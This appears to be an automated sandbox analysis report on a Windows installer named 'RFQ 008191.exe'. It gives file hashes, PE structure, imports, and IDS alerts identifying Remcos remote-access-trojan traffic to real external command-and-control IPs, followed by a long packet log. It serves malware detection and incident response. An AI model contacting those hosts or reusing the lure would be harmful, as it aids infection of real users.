                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):15728640
                                                                  Entropy (8bit):0.10103965264833503
                                                                  Encrypted:false
                                                                  SSDEEP:1536:GSB2jpSB2jFSjlK/4w/ZweshzbOlqVquesezbgl4KCIeszO/Zk3EufY:Ga6amUueqtDiu6b
                                                                  MD5:05ED31CC5A8F6E5591DCBD13F044B588
                                                                  SHA1:E224223FD7D82169BE2B50FA9C5AA514F6EBBC34
                                                                  SHA-256:53CEC4FD5E5126208BA267073853ACD92BF70203157D20DCA7151B98882A914D
                                                                  SHA-512:1F82B82F706EE8ECFA1860E1F81334FAE5D95951B8731A9DE01166DE3925F7363580C78774E405842054E359E8631A9BF1FAC2A8BF22E3F8DCE523D3A0008C5F
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):2
                                                                  Entropy (8bit):1.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Qn:Qn
                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                  Malicious:false
                                                                  Preview:..
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.828737109365321
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:RFQ 008191.exe
                                                                  File size:795'710 bytes
                                                                  MD5:82ba32e4800897e8bafb32990d29f60a
                                                                  SHA1:21b724df29b7ddbcd88849e7ad6ab12a4d266c4c
                                                                  SHA256:777441225b9d294baca2f689286a1f70a0fc28007e86cf1cc099c71ee1d826f2
                                                                  SHA512:7e741fab4e31223a967c4194f31e4fd592b75dc14dde4c72c3fbd5efb28f312807f886290fa8a227037890375d3ada7597857138f4df4d905b0ae4ca7b906101
                                                                  SSDEEP:12288:UXqlVfD6qKMwy8kjKsge8jLAMsnI8c78pc+HeV4PRklT3we+doWVkeehown:UXqzrTK5XsgervnIac+Hm4QT31V1hown
                                                                  TLSH:080502917691123FC15D813BB16B2B71EBAB9F9852776802A223FF0F75367613E08643
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                                  Icon Hash:71868ed4e8b04d49
                                                                  Entrypoint:0x40351c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                  Instruction
                                                                  sub esp, 000003F8h
                                                                  push ebp
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebp, ebp
                                                                  push 00008001h
                                                                  mov dword ptr [esp+20h], ebp
                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                  mov dword ptr [esp+14h], ebp
                                                                  call dword ptr [004080A4h]
                                                                  mov esi, dword ptr [004080A8h]
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push eax
                                                                  mov dword ptr [esp+4Ch], ebp
                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                  mov dword ptr [esp+00000150h], ebp
                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                  call esi
                                                                  test eax, eax
                                                                  jne 00007FFA8961CF2Ah
                                                                  lea eax, dword ptr [esp+34h]
                                                                  mov dword ptr [esp+34h], 00000114h
                                                                  push eax
                                                                  call esi
                                                                  mov ax, word ptr [esp+48h]
                                                                  mov ecx, dword ptr [esp+62h]
                                                                  sub ax, 00000053h
                                                                  add ecx, FFFFFFD0h
                                                                  neg ax
                                                                  sbb eax, eax
                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                  not eax
                                                                  and eax, ecx
                                                                  mov word ptr [esp+00000148h], ax
                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                  jnc 00007FFA8961CEF8h
                                                                  and word ptr [esp+42h], 0000h
                                                                  mov eax, dword ptr [esp+40h]
                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                  mov dword ptr [00429AD8h], eax
                                                                  xor eax, eax
                                                                  mov ah, byte ptr [esp+38h]
                                                                  movzx eax, ax
                                                                  or eax, ecx
                                                                  xor ecx, ecx
                                                                  mov ch, byte ptr [esp+00000148h]
                                                                  movzx ecx, cx
                                                                  shl eax, 10h
                                                                  or eax, ecx
                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x84fc           0xa0          .rdata
                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4d000          0x1f780       .rsrc
                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2a8         .rdata
                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                   Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
                                                                   .text   0x1000           0x6576        0x6600    1e4066ed6e7440cc449c401dfd9ca64f  False     0.6663219975490197  data       6.461246686118911   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                   .rdata  0x8000           0x1358        0x1400    f0b500ff912dda10f31f36da3efc8a1e  False     0.44296875          data       5.102094016108248   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                   .data   0xa000           0x1fb38       0x600     2e1d49b2855a89e6218e118f0c182b81  False     0.5026041666666666  data       4.044293204800279   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .ndata  0x2a000          0x23000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .rsrc   0x4d000          0x1f780       0x1f800   8e8a3197e2686a2d1e03890bd5970dad  False     0.5309554811507936  data       6.149455977169068   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                   Name           RVA      Size     Type                                                                                Language  Country        ZLIB Complexity
                                                                   RT_ICON        0x4d2f8  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 0                     English   United States  0.25881343901573406
                                                                   RT_ICON        0x5db20  0x9f42   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                         English   United States  0.9983811626195732
                                                                   RT_ICON        0x67a68  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0                       English   United States  0.4413900414937759
                                                                   RT_ICON        0x6a010  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0                       English   United States  0.5112570356472795
                                                                   RT_ICON        0x6b0b8  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 0                       English   United States  0.6077868852459016
                                                                   RT_ICON        0x6ba40  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0                       English   United States  0.650709219858156
                                                                   RT_DIALOG      0x6bea8  0x100    data                                                                                English   United States  0.5234375
                                                                   RT_DIALOG      0x6bfa8  0x11c    data                                                                                English   United States  0.6056338028169014
                                                                   RT_DIALOG      0x6c0c8  0xc4     data                                                                                English   United States  0.5918367346938775
                                                                   RT_DIALOG      0x6c190  0x60     data                                                                                English   United States  0.7291666666666666
                                                                   RT_GROUP_ICON  0x6c1f0  0x5a     data                                                                                English   United States  0.7888888888888889
                                                                   RT_VERSION     0x6c250  0x1f0    MS Windows COFF PowerPC object file                                                 English   United States  0.5504032258064516
                                                                   RT_MANIFEST    0x6c440  0x33e    XML 1.0 document, ASCII text, with very long lines (830), with no line terminators  English   United States  0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T16:28:58.760234+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49784 | 212.162.149.89 | 80 | TCP
2024-12-10T16:29:02.256338+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49793 | 212.162.149.91 | 2404 | TCP
2024-12-10T16:29:04.459493+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49799 | 212.162.149.91 | 2404 | TCP
2024-12-10T16:29:04.654488+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49801 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Dec 10, 2024 16:28:59.391133070 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.392855883 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.392951965 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.392987013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394573927 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.394659996 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394715071 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.394778013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394850016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.396601915 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.396655083 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.396713018 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.396754980 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.398624897 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.398686886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.399247885 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.399295092 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.400588989 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.400652885 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.400686026 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.400738001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.402561903 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.402594090 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.402626038 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.402650118 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.404711962 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.404762030 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.405128002 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.405298948 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.406951904 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.407008886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.407181978 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.407239914 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.408430099 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.408483028 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.408616066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.408672094 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.410285950 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.410347939 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.410372019 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.410429001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527175903 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.527266979 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.527357101 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527420998 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527942896 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.528037071 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.528069973 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.528167009 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.529968977 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.530117989 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.530155897 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.530281067 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.531567097 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.531640053 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.531677008 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.531778097 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.533030987 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.533123016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.533186913 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.533308029 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.534650087 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.534714937 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.534755945 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.534795046 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.536308050 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.536382914 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.536408901 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.536515951 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.537797928 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.537877083 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.537908077 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.537997007 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.539700985 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.539769888 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.539793015 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.539849043 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.541234970 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.541332960 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.541337967 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.541405916 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.542573929 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.542670965 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.542712927 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.542779922 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.544189930 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.544297934 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.544336081 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.544418097 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.545851946 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.545938969 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.545972109 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.546057940 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.547435999 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.547513008 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.547666073 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.547756910 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.549127102 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.549216032 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.549293995 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.549397945 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.550827026 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.550908089 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.550937891 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.550997019 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.552376032 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.552460909 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.552519083 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.552649975 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.554359913 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.554455042 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.554560900 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.554630995 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.556216955 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.556569099 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.556592941 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.557842016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.558033943 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.558113098 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.558156013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.558270931 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.559643030 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.559721947 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.559742928 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.559804916 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.561434984 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.561525106 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.561722040 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.561808109 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.563286066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.563421965 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.563422918 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.563558102 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.565005064 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.565067053 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.565099001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.565160036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.566581964 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.566593885 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.566701889 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.567748070 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.567848921 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.647097111 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647190094 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647406101 CET4978480192.168.2.7212.162.149.89
